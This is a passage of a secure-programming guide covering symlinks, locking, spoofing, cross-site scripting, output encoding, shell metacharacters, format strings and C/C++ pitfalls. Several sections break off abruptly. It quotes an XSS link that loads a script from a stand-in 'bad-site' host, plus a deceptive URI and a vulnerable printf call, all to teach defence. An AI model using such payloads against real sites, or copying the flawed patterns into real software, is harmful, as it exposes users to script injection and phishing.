capability, then the hard link is forbidden. The check against the process uid may be dropped someday
(it is a work-around for the atd(8) program), at which point the rules would be: if the process'
fsuid (usually the same as the euid) is different from the linked-to-file's uid and the process
lacks the FOWNER capability, then the hard link is forbidden. In other words, you can only create
hard links to files you own, unless you have the FOWNER capability.
• Symbolic links (symlinks): Certain symlinks are not followed. The original OpenWall documentation
states that “root processes may not follow symlinks that are not owned by root”, but the actual rules
(from looking at the code) are more complicated. In the LSM version, if the directory is sticky ("+t"
mode, used in shared directories like /tmp), symlinks are not followed if the symlink was created by
anyone other than either the owner of the directory or the current process’ fsuid (which is usually the
effective uid).
Many systems do not implement this openwall policy, so in general you can't depend on it to protect
your system. However, I encourage using this policy on your own system, and please make sure that your
application will work when this policy is in place.
7.11.2. Locking
There are often situations in which a program must ensure that it has exclusive rights to something (e.g.,
a file, a device, and/or existence of a particular server process). Any system which locks resources must
deal with the standard problems of locks, namely, deadlocks (“deadly embraces”), livelocks, and
releasing “stuck” locks if a program doesn’t clean up its locks. A deadlock can occur if programs are
stuck waiting for each other to release resources. For example, a deadlock would occur if process 1 locks
resources A and waits for resource B, while process 2 locks resource B and waits for resource A. Many
deadlocks can be prevented by simply requiring all processes that lock multiple resources to lock them in
the same order (e.g., alphabetically by lock name).
It’s important that the programs which are cooperating using files to represent the locks use the same
directory, not just the same directory name. This is an issue with networked systems: the FHS explicitly
notes that /var/run and /var/lock are unshareable, while /var/mail is shareable. Thus, if you want the lock
to work on a single machine, but not interfere with other machines, use unshareable directories like
/var/run (e.g., you want to permit each machine to run its own server). However, if you want all machines
sharing files in a network to obey the lock, you need to use a directory that they’re sharing; /var/mail is
one such location. See FHS section 2 for more information on this subject.
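As a sketch of the file-based locking these directories are used for (the lock pathname, the lack of retry
logic, and the cleanup strategy are illustrative assumptions):

#include <fcntl.h>
#include <unistd.h>

/* Take a machine-wide lock by atomically creating a lock file; O_EXCL
 * guarantees at most one process succeeds. Returns the descriptor, or -1
 * if the lock is already held (or another error occurred). */
int take_lock(const char *lockpath)
{
  return open(lockpath, O_CREAT | O_EXCL | O_WRONLY, 0644);
}

/* Release the lock by removing the lock file and closing the descriptor. */
void release_lock(const char *lockpath, int fd)
{
  unlink(lockpath);
  close(fd);
}

A server would call take_lock("/var/run/myapp.lock") at startup (the name is hypothetical) and exit or
retry if the call fails.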
by requiring that the sender use a “trusted” port number (a number less than 1024). The problem is that in
many environments an attacker can forge these values.
In some environments, checking these values (e.g., the sending machine IP address and/or port) can have
some value, so it’s not a bad idea to support such checking as an option in a program. For example, if a
system runs behind a firewall, the firewall can’t be breached or circumvented, and the firewall stops
external packets that claim to be from the inside, then you can assume that any packet claiming to be from
the inside really is from the inside. Note that you can't be sure the packet actually comes from the machine it claims it
comes from - so you’re only countering external threats, not internal threats. However, broken firewalls,
alternative paths, and mobile code make even these assumptions suspect.
The problem is relying on untrustworthy information as the only way to authenticate someone. If you
need a trustworthy channel over an untrusted network, in general you need some sort of cryptologic
service (at the very least, a cryptologically safe hash). See Section 11.5 for more information on
cryptographic algorithms and protocols. If you’re implementing a standard and inherently insecure
protocol (e.g., ftp and rlogin), provide safe defaults and document the assumptions clearly.
The Domain Name Server (DNS) is widely used on the Internet to maintain mappings between the
names of computers and their IP (numeric) addresses. The technique called “reverse DNS” eliminates
some simple spoofing attacks, and is useful for determining a host’s name. However, this technique is not
trustworthy for authentication decisions. The problem is that, in the end, a DNS request will eventually be
sent to some remote system that may be controlled by an attacker. Therefore, treat DNS results as
an input that needs validation, and don't trust them for serious access control.
Arbitrary email (including the “from” value of addresses) can be forged as well. Using digital signatures
is a method to thwart many such attacks. A more easily thwarted approach is to require emailing back
and forth with special randomly-created values, but for low-value transactions such as signing onto a
public mailing list this is usually acceptable.
Note that in any client/server model, including CGI, the server must assume that the client (or
someone interposing between the client and server) can modify any value. For example, so-called
“hidden fields” and cookie values can be changed by the client before being received by CGI programs.
These cannot be trusted unless special precautions are taken. For example, the hidden fields could be
signed in a way the client cannot forge as long as the server checks the signature. The hidden fields could
also be encrypted using a key only the trusted server could decrypt (this latter approach is the basic idea
behind the Kerberos authentication system). InfoSec labs has further discussion about hidden fields and
applying encryption at http://www.infoseclabs.com/mschff/mschff.htm. In general, you’re better off
keeping data you care about at the server end in a client/server model. In the same vein, don’t depend on
HTTP_REFERER for authentication in a CGI program, because this is sent by the user’s browser (not
the web server).
This issue applies to data referencing other data, too. For example, HTML or XML allow you to include
by reference other files (e.g., DTDs and style sheets) that may be stored remotely. However, those
external references could be modified so that users see a very different document than intended; a style
sheet could be modified to “white out” words at critical locations, deface its appearance, or insert new
text. External DTDs could be modified to prevent use of the document (by adding declarations that break
validation) or insert different text into documents [St. Laurent 2000].
making sure that the web address is very simple and not normally misspelled (so misspelling it is
unlikely). You might also want to gain ownership of some “similar” sounding DNS names, and search
for other such DNS names and material to find attackers. Some versions of Microsoft’s Internet Explorer
won’t allow the "@" symbol at all in URLs; this is an unfortunate restriction, but probably good for
security. Another less draconian solution would have been to put up a warning dialogue, clearly
displaying the real site name and user name.
creating an “infinite” number of windows), and even very destructive attacks (by inserting attacks on
security vulnerabilities such as scripting languages or buffer overflows in browsers). By embedding
malicious FORM tags at the right place, an intruder may even be able to trick users into revealing
sensitive information (by modifying the behavior of an existing form). Or, by embedding scripts, an
intruder can cause no end of problems. This is by no means an exhaustive list of problems, but hopefully
this is enough to convince you that this is a serious problem.
Most “discussion boards” have already discovered this problem, and most already take steps to prevent it
in text intended to be part of a multiperson discussion. Unfortunately, many web application developers
don’t realize that this is a much more general problem. Every data value that is sent from one user to
another can potentially be a source for cross-site malicious posting, even if it’s not an “obvious” case of
an area where arbitrary HTML is expected. The malicious data can even be supplied by the user himself,
since the user may have been fooled into supplying the data via another site. Here’s an example (from
CERT) of an HTML link that causes the user to send malicious data to another site:
<A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT
SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A>
In short, a web application cannot accept input (including any form data) without checking, filtering, or
encoding it. You can’t even pass that data back to the same user in many cases in web applications, since
another user may have surreptitiously supplied the data. Even if permitting such material won’t hurt your
system, it will enable your system to be a conduit of attacks to your users. Even worse, those attacks will
appear to be coming from your system.
CERT describes the problem this way in their advisory:
A web site may inadvertently include malicious HTML tags or script in a dynamically generated page based on
unvalidated input from untrustworthy sources (CERT Advisory CA-2000-02, Malicious HTML Tags
Embedded in Client Web Requests).
More information from CERT about this is available at
http://www.cert.org/archive/pdf/cross_site_scripting.pdf. The paper The Anatomy of Cross Site Scripting
discusses some of XSS’s ramifications.
Warning - in many cases these techniques can be subverted unless you’ve also gained control over the
character encoding of the output. Otherwise, an attacker could use an “unexpected” character encoding
to subvert the techniques discussed here. Thankfully, this isn’t hard; gaining control over output
character encoding is discussed in Section 9.5.
One minor defense, that’s often worth doing, is the "HttpOnly" flag for cookies. Scripts that run in a web
browser cannot access cookie values that have the HttpOnly flag set (they just get an empty value
instead). This is currently implemented in Microsoft Internet Explorer, and I expect Mozilla/Netscape to
implement this soon too. You should set HttpOnly on for any cookie you send, unless you have scripts
that need the cookie, to counter certain kinds of cross-site scripting (XSS) attacks. However, the
HttpOnly flag can be circumvented in a variety of ways, so using it as your primary defense is
inappropriate. Instead, it's a helpful secondary defense that may help save you in case your application is
written incorrectly.
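For example, a cookie set with the flag looks something like this (the cookie name and value are
illustrative):

  Set-Cookie: session=a3fWa; HttpOnly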
The first subsection below discusses how to identify special characters that need to be filtered, encoded,
or validated. This is followed by subsections describing how to filter or encode these characters. There’s
no subsection discussing how to validate data in general, however, for input validation in general see
Chapter 5, and if the input is straight HTML text or a URI, see Section 5.13. Also note that your web
application can receive malicious cross-postings, so non-queries should forbid the GET protocol (see
Section 5.14).
• In the content of a block-level element (e.g., in the middle of a paragraph of text in HTML or a block
in XML):
• In attribute values:
• In attribute values enclosed with double quotes, the double quotes are special because they mark the
end of the attribute value.
• In attribute values enclosed with single quotes, the single quotes are special because they mark the
end of the attribute value. XML’s definition allows single quotes, but I’ve been told that some XML
parsers don’t handle them correctly, so you might avoid using single quotes in XML.
• Attribute values without any quotes make the white-space characters such as space and tab special.
Note that these aren’t legal in XML either, and they make more characters special. Thus, I
recommend against unquoted attributes if you’re using dynamically generated values in them.
• "&" is special when used in conjunction with some attributes because it introduces a character
entity.
• In URLs, for example, a search engine might provide a link within the results page that the user can
click to re-run the search. This can be implemented by encoding the search query inside the URL.
When this is done, it introduces additional special characters:
• Space, tab, and new line are special because they mark the end of the URL.
• "&" is special because it introduces a character entity or separates CGI parameters.
• Non-ASCII characters (that is, everything above 128 in the ISO-8859-1 encoding) aren’t allowed in
URLs, so they are all special here.
• The "%" must be filtered from input anywhere parameters encoded with HTTP escape sequences
are decoded by server-side code. The percent must be filtered if input such as
"%68%65%6C%6C%6F" becomes "hello" when it appears on the web page in question.
• Within the body of a <SCRIPT> </SCRIPT> the semicolon, parenthesis, curly braces, and new line
should be filtered in situations where text could be inserted directly into a preexisting script tag.
• Server-side scripts that convert any exclamation characters (!) in input to double-quote characters (")
on output might require additional filtering.
Note that, in general, the ampersand (&) is special in HTML and XML.
7.16.2.2. Filtering
One approach to handling these special characters is simply eliminating them (usually during input or
output).
If you’re already validating your input for valid characters (and you generally should), this is easily done
by simply omitting the special characters from the list of valid characters. Here’s an example in Perl of a
filter that only accepts legal characters, and since the filter doesn’t accept any special characters other
than the space, it’s quite acceptable for use in areas such as a quoted attribute:
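 # Illustrative sketch: accept only letters, digits, spaces, and periods,
 # silently deleting everything else.
 $data =~ tr/A-Za-z0-9. //cd;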
However, if you really want to strip away only the smallest number of characters, then you could create a
subroutine to remove just those characters:
sub remove_special_chars {
  local($s) = @_;
  $s =~ s/[\<\>\"\'\%\;\(\)\&\+]//g;
  return $s;
}
# Sample use:
$data = &remove_special_chars($data);
• A numeric character reference looks like “&#D;”, where D is a decimal number, or “&#xH;” or
“&#XH;”, where H is a hexadecimal number. The number given is the ISO 10646 character id (which
has the same character values as Unicode). Thus &#1048; is the Cyrillic capital letter "I". The
hexadecimal system isn’t supported in the SGML standard (ISO 8879), so I’d suggest using the
decimal system for output. Also, although SGML specification permits the trailing semicolon to be
omitted in some circumstances, in practice many systems don’t handle it - so always include the
trailing semicolon.
• A character entity reference does the same thing but uses mnemonic names instead of numbers. For
example, "&lt;" represents the < sign. If you're generating HTML, see the HTML specification which
lists all mnemonic names.
Either system (numeric or character entity) works; I suggest using character entity references for “<”,
“>”, “&”, and “"” because it makes your code (and output) easier for humans to understand. Other than
that, it’s not clear that one or the other system is uniformly better. If you expect humans to edit the output
by hand later, use the character entity references where you can, otherwise I’d use the decimal numeric
character references just because they’re easier to program. This encoding scheme can be quite
inefficient for some languages (especially Asian languages); if that is your primary content, you might
choose to use a different character encoding (charset), filter on the critical characters (e.g., "<") and
ensure that no alternative encodings for critical characters are allowed.
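A minimal sketch of such output encoding in C (only the four characters recommended above are
encoded; extend the set as your context requires):

#include <stdio.h>

/* Write untrusted text to a web page with the HTML/XML-special
 * characters replaced by character entity references. */
void print_html_escaped(FILE *out, const char *s)
{
  for (; *s != '\0'; s++) {
    switch (*s) {
    case '<':  fputs("&lt;", out);   break;
    case '>':  fputs("&gt;", out);   break;
    case '&':  fputs("&amp;", out);  break;
    case '"':  fputs("&quot;", out); break;
    default:   fputc(*s, out);       break;
    }
  }
}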
URIs have their own encoding scheme, commonly called “URL encoding.” In this system, characters not
permitted in URLs are represented using a percent sign followed by its two-digit hexadecimal value. To
handle all of ISO 10646 (Unicode), it’s recommended to first translate the codes to UTF-8, and then
encode it. See Section 5.13.4 for more about validating URIs.
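Here is a sketch of that encoding in C (the set of characters passed through unencoded - ASCII letters,
digits, and a few marks - is an assumption; the caller must supply an output buffer at least three times
the input length plus one):

/* Percent-encode every byte that is not an ASCII letter, digit, or one of
 * a few safe marks. The input is assumed to already be UTF-8. */
void url_encode(const char *in, char *out)
{
  static const char hex[] = "0123456789ABCDEF";
  for (; *in != '\0'; in++) {
    unsigned char c = (unsigned char)*in;
    if ((c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
        (c >= '0' && c <= '9') ||
        c == '-' || c == '_' || c == '.' || c == '~') {
      *out++ = (char)c;          /* unreserved: copy through unchanged */
    } else {
      *out++ = '%';              /* everything else becomes %XX */
      *out++ = hex[c >> 4];
      *out++ = hex[c & 0x0F];
    }
  }
  *out = '\0';
}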
http://[email protected]
If a user clicked on that URI, they might think that they’re going to Bloomberg (who provide financial
commodities news), but instead they’re going to www.badguy.com (and providing the username
www.bloomberg.com, which www.badguy.com will conveniently ignore). If the badguy.com website
then imitated the bloomberg.com site, a user might be convinced that they’re seeing the real thing (and
make investment decisions based on attacker-controlled information). This depends on URIs being used
in an unusual way - clickable URIs can have usernames, but usually don’t. One solution for this case is
for the web browser to detect such unusual URIs and create a pop-up confirmation widget, saying “You
are about to log into www.badguy.com as user www.bloomberg.com; do you wish to proceed?” If the
widget allows the user to change these entries, it provides additional functionality to the user as well as
providing protection against that attack.
Another example is homographs, particularly international homographs. Certain letters look similar to
each other, and these can be exploited as well. For example, since 0 (zero) and O (the letter O) look
similar to each other, users may not realize that WWW.BLOOMBERG.COM and
WWW.BL00MBERG.COM are different web addresses. Other similar-looking letters include 1 (one)
and l (lower-case L). If international characters are allowed, the situation is worse. For example, many
Cyrillic letters look essentially the same as Roman letters, but the computer will treat them differently.
Currently most systems don’t allow international characters in host names, but for various good reasons
it's widely agreed that support for them will be necessary in the future. One proposed solution has been
to display letters from different code regions using different colors - that way, users get more information
visually. If users look at the URI, they will hopefully notice the strange coloring. [Gabrilovich 2002] The
page Phishing - Browser-based Defences provides another set of possible defenses against this attack.
However, this does show the essence of a semantic attack - it’s difficult to defend against, precisely
because the computers are working correctly.
Chapter 8. Carefully Call Out to Other
Resources
Do not put your trust in princes, in
mortal men, who cannot save.
Psalms 146:3 (NIV)
Practically no program is truly self-contained; nearly all programs call out to other programs for
resources, such as programs provided by the operating system, software libraries, and so on. Sometimes
this calling out to other resources isn’t obvious or involves a great deal of “hidden” infrastructure which
must be depended on, e.g., the mechanisms to implement dynamic libraries. Clearly, you must be careful
about what other resources your program trusts, and you must make sure that the requests you send to
them are sent safely.
are sent to the shell, then their special interpretation will be used unless escaped; this fact can be used to
break programs. According to the WWW Security FAQ [Stein 1999, Q37], these metacharacters are:
The # character is a comment character, and thus is also a metacharacter. The separator values can be
changed by setting the IFS environment variable, but if you can’t trust the source of this variable you
should have thrown it out or reset it anyway as part of your environment variable processing.
Unfortunately, in real life this isn’t a complete list. Here are some other characters that can be
problematic:
• ’!’ means “not” in an expression (as it does in C); if the return value of a program is tested, prepending
! could fool a script into thinking something had failed when it succeeded or vice versa. In some shells,
the "!" also accesses the command history, which can cause real problems. In bash, this only occurs
for interactive mode, but tcsh (a csh clone found in some Linux distributions) uses "!" even in scripts.
• ’#’ is the comment character; all further text on the line is ignored.
• ’-’ can be misinterpreted as leading an option (or, as - -, disabling all further options). Even if it’s in
the “middle” of a filename, if it’s preceded by what the shell considers as whitespace you may have a
problem.
• ’ ’ (space), ’\t’ (tab), ’\n’ (newline), ’\r’ (return), ’\v’ (vertical space), ’\f’ (form feed), and other
whitespace characters can have many dangerous effects. They may turn a “single” filename into
multiple arguments, for example, or turn a single parameter into multiple parameters when stored.
Newline and return have a number of additional dangers, for example, they can be used to create
“spoofed” log entries in some programs, or inserted just before a separate command that is then
executed (if an underlying protocol uses newlines or returns as command separators).
• Other control characters (in particular, NIL) may cause problems for some shell implementations.
• Depending on your usage, it’s even conceivable that “.” (the “run in current shell”) and “=” (for setting
variables) might be worrisome characters. However, any example I’ve found so far where these are
issues has other (much worse) security problems.
Forgetting one of these characters can be disastrous, for example, many programs omit backslash as a
shell metacharacter [rfp 1999]. As discussed in Chapter 5, a recommended approach by some is to
immediately escape at least all of these characters when they are input.
So simply creating a list of characters that are forbidden is a bad idea (because that is a blacklist). Instead,
identify the characters that are acceptable, and then forbid or correctly escape all others (a whitelist).
What makes the shell metacharacters particularly pervasive is that several important library calls, such as
popen(3) and system(3), are implemented by calling the command shell, meaning that they will be
affected by shell metacharacters too. Similarly, execlp(3) and execvp(3) may cause the shell to be called.
Many guidelines suggest avoiding popen(3), system(3), execlp(3), and execvp(3) entirely and use
execve(3) directly in C when trying to spawn a process [Galvin 1998b]. At the least, avoid using
system(3) when you can use the execve(3); since system(3) uses the shell to expand characters, there is
more opportunity for mischief in system(3). In a similar manner the Perl and shell backtick (‘) also call a
command shell; for more information on Perl see Section 10.2.
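As a minimal sketch of calling out without involving the shell (the program path, the argument list, and
the error handling are illustrative assumptions):

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Run /usr/bin/sort on a user-supplied filename. Because no shell is
 * involved, shell metacharacters in the filename are never interpreted. */
static int sort_file(const char *userfile)
{
  pid_t pid = fork();
  if (pid < 0)
    return -1;
  if (pid == 0) {
    char *const argv[] = { "sort", (char *)userfile, NULL };
    char *const envp[] = { NULL };      /* minimal, controlled environment */
    execve("/usr/bin/sort", argv, envp);
    _exit(127);                         /* reached only if execve() failed */
  }
  int status = 0;
  waitpid(pid, &status, 0);
  return status;
}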
filename. A simple solution is to prefix all globs or filenames where needed with "./" so that they cannot
begin with "-". So for example, never use "*.pdf" to refer to a set of PDFs; use "./*.pdf".
Be careful about displaying or storing pathnames, since they can include newlines, tabs, escape (which
can begin terminal controls), or sequences that are not legal strings. On some systems, merely displaying
filenames can invoke terminal controls, which can then run commands with the privilege of the one
displaying.
For more detailed information, see Filenames and Pathnames in Shell: How to do it correctly.
trickier to handle; some old systems implement them as if they weren’t set, but simply filtering them
inhibits much international use. In this case, you need to look at the specifics of your situation.
A related problem is that the NIL character (character 0) can have surprising effects. Most C and C++
functions assume that this character marks the end of a string, but string-handling routines in other
languages (such as Perl and Ada95) can handle strings containing NIL. Since many libraries and kernel
calls use the C convention, the result is that what is checked is not what is actually used [rfp 1999].
When calling another program or referring to a file it may be wise to specify its full path (e.g.,
/usr/bin/sort). For program calls, this will eliminate possible errors in calling the “wrong”
command, even if the PATH value is incorrectly set. For other file referents, this reduces problems from
“bad” starting directories.
suspended while the child is using its resources. The rationale is that in old BSD systems, fork(2) would
actually cause memory to be copied while vfork(2) would not. Linux never had this problem; because
Linux used copy-on-write semantics internally, Linux only copies pages when they changed (actually,
there are still some tables that have to be copied; in most circumstances their overhead is not significant).
Nevertheless, since some programs depend on vfork(2), recently Linux implemented the BSD vfork(2)
semantics (previously vfork(2) had been an alias for fork(2)).
There are a number of problems with vfork(2). From a portability point-of-view, the problem with
vfork(2) is that it’s actually fairly tricky for a process to not interfere with its parent, especially in
high-level languages. The “not interfering” requirement applies to the actual machine code generated,
and many compilers generate hidden temporaries and other code structures that cause unintended
interference. The result: programs using vfork(2) can easily fail when the code changes or even when
compiler versions change.
For secure programs it gets worse on Linux systems, because Linux (at least 2.2 versions through 2.2.17)
is vulnerable to a race condition in vfork()’s implementation. If a privileged process uses a
vfork(2)/execve(2) pair in Linux to execute user commands, there’s a race condition while the child
process is already running as the user's UID, but hasn't entered execve(2) yet. The user may be able to
send signals, including SIGSTOP, to this process. Due to the semantics of vfork(2), the privileged parent
process would then be blocked as well. As a result, an unprivileged process could cause the privileged
process to halt, resulting in a denial-of-service of the privileged process’ service. FreeBSD and
OpenBSD, at least, have code to specifically deal with this case, so to my knowledge they are not
vulnerable to this problem. My thanks to Solar Designer, who noted and documented this problem in
Linux on the “security-audit” mailing list on October 7, 2000.
The bottom line with vfork(2) is simple: don’t use vfork(2) in your programs. This shouldn’t be difficult;
the primary use of vfork(2) is to support old programs that needed vfork’s semantics.
Web bugs are used extensively today by Internet advertising companies on Web pages and in HTML-based
email messages for tracking. They are typically 1-by-1 pixel in size to make them invisible on the screen,
disguising the fact that they are used for tracking. However, they could be any image (using the img tag); other
HTML tags can implement web bugs too, e.g., frames, form invocations, and scripts. By itself, invoking the
web bug will provide the “bugging” site the reader's IP address, the page that the reader visited, and various
information about the browser; by also using cookies it's often possible to determine the specific identity of the
reader.
Chapter 9. Send Information Back Judiciously
Do not answer a fool according to his
folly, or you will be like him yourself.
Proverbs 26:4 (NIV)
• If your program requires some sort of user authentication (e.g., you’re writing a network service or
login program), give the user as little information as possible before they authenticate. In particular,
avoid giving away the version number of your program before authentication. Otherwise, if a
particular version of your program is found to have a vulnerability, then users who don’t upgrade from
that version advertise to attackers that they are vulnerable.
• If your program accepts a password, don’t echo it back; this creates another way passwords can be
seen.
I recommend implementing audit logging early in development. Audit logs are really convenient for
debugging (because they are designed to record useful information without interfering with normal
operations), and you are more likely to include useful status information in the logs if they are developed
in parallel with the rest of the program.
/* Wrong way: */
printf(string_from_untrusted_user);
/* Right ways: */
printf("%s", string_from_untrusted_user); /* safe */
fputs(string_from_untrusted_user, stdout); /* better for simple strings */
If an attacker controls the formatting information, an attacker can cause all sorts of mischief by carefully
selecting the format. The case of C’s printf() is a good example - there are lots of ways to possibly exploit
user-controlled format strings in printf(). These include buffer overruns by creating a long formatting
string (this can result in the attacker having complete control over the program), conversion specifications
that use unpassed parameters (causing unexpected data to be inserted), and creating formats which
produce totally unanticipated result values (say by prepending or appending awkward data, causing
problems in later use). A particularly nasty case is printf’s %n conversion specification, which writes the
number of characters written so far into the pointer argument; using this, an attacker can overwrite a
value that was intended for printing! An attacker can even overwrite almost arbitrary locations, since the
attacker can specify a “parameter” that wasn’t actually passed. The %n conversion specification has been a
standard part of C since its beginning, is required by all C standards, and is used by real programs. In
2000, Greg KH did a quick search of source code and identified the programs BitchX (an irc client),
Nedit (a program editor), and SourceNavigator (a program editor / IDE / Debugger) as using %n, and
there are doubtless many more. Deprecating %n would probably be a good idea, but even without %n
there can be significant problems. Many papers discuss these attacks in more detail; for example, see
Avoiding security holes when developing an application - Part 4: format strings.
Since in many cases the results are sent back to the user, this attack can also be used to expose internal
information about the stack. This information can then be used to circumvent stack protection systems
such as StackGuard and ProPolice; StackGuard uses constant “canary” values to detect attacks, but if the
stack’s contents can be displayed, the current value of the canary will be exposed, suddenly making the
software vulnerable again to stack smashing attacks.
A formatting string should almost always be a constant string, possibly involving a function call to
implement a lookup for internationalization (e.g., via gettext’s _()). Note that this lookup must be limited
to values that the program controls, i.e., the user must be allowed to only select from the message files
controlled by the program. It’s possible to filter user data before using it (e.g., by designing a filter listing
legal characters for the format string such as [A-Za-z0-9]), but it’s usually better to simply prevent the
problem by using a constant format string or fputs() instead. Note that although I’ve listed this as an
“output” problem, this can cause problems internally to a program before output (since the output
routines may be saving to a file, or even just generating internal state such as via snprintf()).
The problem of input formatting causing security problems is not an idle possibility; see CERT Advisory
CA-2000-13 for an example of an exploit using this weakness. For more information on how these
problems can be exploited, see Pascal Bouchareine’s email article titled “[Paper] Format bugs”,
published in the July 18, 2000 edition of Bugtraq. As of December 2000, developmental versions of the
gcc compiler support warning messages for insecure format string usages, in an attempt to help
developers avoid these problems.
Of course, this all raises the question of whether the internationalization lookup is, in fact,
secure. If you’re creating your own internationalization lookup routines, make sure that an untrusted user
can only specify a legal locale and not something else like an arbitrary path.
Clearly, you want to limit the strings created through internationalization to ones you can trust.
Otherwise, an attacker could use this ability to exploit the weaknesses in format strings, particularly in
C/C++ programs. This has been an item of discussion in Bugtraq (e.g., see John Levon’s Bugtraq post on
July 26, 2000). For more information, see the discussion on permitting users to only select legal language
values in Section 5.10.3.
Although it’s really a programming bug, it’s worth mentioning that different countries notate numbers in
different ways, in particular, both the period (.) and comma (,) are used to separate an integer from its
fractional part. If you save or load data, you need to make sure that the active locale does not interfere
with data handling. Otherwise, a French user may not be able to exchange data with an English user,
because the data stored and retrieved will use different separators. I’m unaware of this being used as a
security problem, but it’s conceivable.
Many web pages leave the character encoding ("charset" parameter in HTTP) undefined. In earlier versions of
HTML and HTTP, the character encoding was supposed to default to ISO-8859-1 if it wasn’t defined. In fact,
many browsers had a different default, so it was not possible to rely on the default being ISO-8859-1. HTML
version 4 legitimizes this - if the character encoding isn’t specified, any character encoding can be used.
If the web server doesn’t specify which character encoding is in use, it can’t tell which characters are special.
Web pages with unspecified character encoding work most of the time because most character sets assign the
same characters to byte values below 128. But which of the values above 128 are special? Some 16-bit
character-encoding schemes have additional multi-byte representations for special characters such as "<".
Some browsers recognize this alternative encoding and act on it. This is "correct" behavior, but it makes attacks
using malicious scripts much harder to prevent. The server simply doesn’t know which byte sequences
represent the special characters.
For example, UTF-7 provides alternative encoding for "<" and ">", and several popular browsers recognize
these as the start and end of a tag. This is not a bug in those browsers. If the character encoding really is
UTF-7, then this is correct behavior. The problem is that it is possible to get into a situation in which the
browser and the server disagree on the encoding.
Thankfully, though explaining the issue is tricky, its resolution in HTML is easy. In the HTML header,
simply specify the charset, like this example from CERT:
<HTML>
<HEAD>
<META http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1">
<TITLE>HTML SAMPLE</TITLE>
</HEAD>
<BODY>
<P>This is a sample HTML page
</BODY>
</HTML>
From a technical standpoint, an even better approach is to set the character encoding as part of the HTTP
protocol output, though some libraries make this more difficult. This is technically better because it
doesn’t force the client to examine the header to determine a character encoding that would enable it to
read the META information in the header. Of course, in practice a browser that couldn’t read the META
information given above and use it correctly would not succeed in the marketplace, but that’s a different
issue. In any case, this just means that the server would need to send, as part of the HTTP protocol, a
“charset” parameter with the desired value. Unfortunately, it’s hard to heartily recommend this (technically better)
approach, because some older HTTP/1.0 clients did not deal properly with an explicit charset parameter.
Although the HTTP/1.1 specification requires clients to obey the parameter, it’s suspicious enough that
you probably ought to use it as an adjunct to forcing the use of the correct character encoding, and not
your sole mechanism.
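For example, the HTTP response would then include a header line like this (exactly how you emit it depends on your web server or library):
Content-Type: text/html; charset=ISO-8859-1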
• Place the include/configuration files outside of the web documentation root (so that the web server will
never serve the files). Really, this is the best approach unless there’s some reason the files have to be
inside the document root.
• Configure the web server so it will not serve include files as text. For example, if you’re using Apache,
you can add a handler or an action for .inc files like so:
<Files *.inc>
Order allow,deny
Deny from all
</Files>
• Place the include files in a protected directory (using .htaccess), and designate them as files that won’t
be served.
• Use a filter to deny access to the files. For Apache, this can be done using:
<Files ~ "\.phpincludes">
Order allow,deny
Deny from all
</Files>
If you need full regular expressions to match filenames, in Apache you could use the FilesMatch
directive.
• If your include file is a valid script file, which your server will parse, make sure that it doesn’t act on
user-supplied parameters and that it’s designed to be secure.
These approaches won’t protect you from users who have access to the directories your files are in if they
are world-readable. You could change the permissions of the files so that only the uid/gid of the
webserver can read these files. However, this approach won’t work if the user can get the web server to
run his own scripts (the user can just write scripts to access your files). Fundamentally, if your site is
being hosted on a server shared with untrusted people, it’s harder to secure the system. One approach is
to run multiple web serving programs, each with different permissions; this provides more security but is
painful in practice. Another approach is to set these files to be read only by your uid/gid, and have the
server run scripts at “your” permission. This latter approach has its own problems: it means that certain
parts of the server must have root privileges, and that the script may have more permissions than
necessary.
Chapter 10. Language-Specific Issues
Undoubtedly there are all sorts of
languages in the world, yet none of them
is without meaning.
1 Corinthians 14:10 (NIV)
The issues discussed in the rest of this book generally apply to all languages (though some are more
common, or not present, in particular languages). However, there are also many language-specific
security issues. Many of them can be summarized as follows:
• Turn on all relevant warnings and protection mechanisms available to you where practical. For
compiled languages, this includes both compile-time mechanisms and run-time mechanisms. In
general, security-relevant programs should compile cleanly with all warnings turned on.
• If you can use a “safe mode” (e.g., a mode that limits the activities of the executable), do so. Many
interpreted languages include such a mode. In general, don’t depend on the safe mode to provide
absolute protection; most languages’ safe modes have not been sufficiently analyzed for their security,
and when they are, people usually discover many ways to exploit them. However, by writing your code so
that it’s secure out of safe mode, and then adding the safe mode, you end up with defense-in-depth
(since in many cases, an attacker has to break both your application code and the safe mode).
• Avoid dangerous and deprecated operations in the language. By “dangerous”, I mean operations which
are difficult to use correctly. For example, many languages include some mechanisms or functions that
are “magical”, that is, they try to infer the “right” thing to do using a heuristic - generally you should
avoid them, because an attacker may be able to exploit the heuristic and do something dangerous
instead of what was intended. A common error is an “off-by-one” error, in which the bound is off by
one, and sometimes these result in exploitable errors. In general, write code in a way that minimizes
the likelihood of off-by-one errors. If there are standard conventions in the language (e.g., for writing
loops), use them.
• Ensure that the language’s infrastructure (e.g., its run-time library) is available and secured.
• In languages that automatically garbage-collect strings, be especially careful to immediately erase
secret data (in particular secret keys and passwords).
• Know precisely the semantics of the operations that you are using. Look up each operation’s semantics
in its documentation. Do not ignore return values unless you’re sure they cannot be relevant. Don’t
ignore the difference between “signed” and “unsigned” values. This is particularly difficult in
languages which don’t support exceptions, like C, but that’s the way it goes.
Here are some of the key issues for specific languages. However, do not forget the issues discussed
elsewhere. For example, most languages have a formatting library, so be careful to ensure that an attacker
cannot control the format commands (see Section 9.4 for more information).
10.1. C/C++
It is possible to develop secure code using C or C++, but both languages include fundamental design
decisions that make it more difficult to write secure code. C and C++ easily permit buffer overflows,
force programmers to do their own memory management, and are fairly lax in their typing systems. For
systems programs (such as an operating system kernel), C and C++ are fine choices. For applications, C
and C++ are often over-used. Strongly consider using an even higher-level language, at least for the
majority of the application. But clearly, there are many existing programs in C and C++ which won’t get
completely rewritten, and many developers may choose to develop in C and C++.
One of the biggest security problems with C and C++ programs is buffer overflow; see Chapter 6 for
more information. C has the additional weakness of not supporting exceptions, which makes it easy to
write programs that ignore critical error situations.
Another problem with C and C++ is that developers have to do their own memory management (e.g.,
using malloc(), calloc(), realloc(), free(), new, and delete), and failing to do it correctly may result in a security flaw.
The more serious problem is that programs may erroneously free memory that should not be freed (e.g.,
because it’s already been freed). This can result in an immediate crash or be exploitable, allowing an
attacker to cause arbitrary code to be executed; see [Anonymous Phrack 2001]. Some systems (such as
many GNU/Linux systems) don’t protect against double-freeing at all by default, and it is not clear that
